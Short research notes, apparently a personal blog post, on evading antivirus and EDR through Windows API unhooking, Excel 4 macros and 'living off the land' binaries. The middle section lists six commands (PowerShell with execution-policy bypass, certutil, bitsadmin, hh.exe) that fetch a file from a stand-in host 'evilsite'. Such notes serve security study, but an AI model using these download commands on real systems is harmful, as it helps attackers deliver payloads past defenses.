Trying to read up on this for some work things. Dropping a few links here. Will add more notes as I go on.
——————————————————————
bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis
“””
It’s worth noting that not all the functions get hijacked by AVs/EDRs. Usually only those functions that are known to be abused over and over again in the wiled that get hooked – think CreareRemoteThread, NtQueueApcThread and similar.
“””
This led me to this article: old School Evil Excel 4 Macros
——————————————————————
Somehow ended up here: Alternate Download Ideas
- powershell.exe -ep bypass Invoke-WebRequest -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
- powershell.exe -ep bypass Invoke-RestMethod -Uri http://evilsite:port/evilfile -OutFile c:\temp\evilfile
- powershell.exe -ep bypass Start-BitsTransfer -Source http://evilsite:port/evilfile -Destination c:\temp\evilfile
- certutil.exe -urlcache -split -f “http://evilsite:port/evilfile” c:\temp\evilfile
- bitsadmin /transfer myDownloadJob /download /priority normal http://evilsite:port/evilfile c:\temp\evilfile
- hh.exe “http://evilsite/evilfile”
——————————————————————
Then I started digging more into this, as I probably should have from the beginning; LOL bins
“””
Right now there are:
- Bitsadmin.exe
- Certutil.exe
- Esentutl.exe
- Expand.exe
- Extrac32.exe
- Findstr.exe
- Hh.exe
- Ieexec.exe
- Makecab.exe
- Replace.exe for Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 and the equivalent Server versions.
“””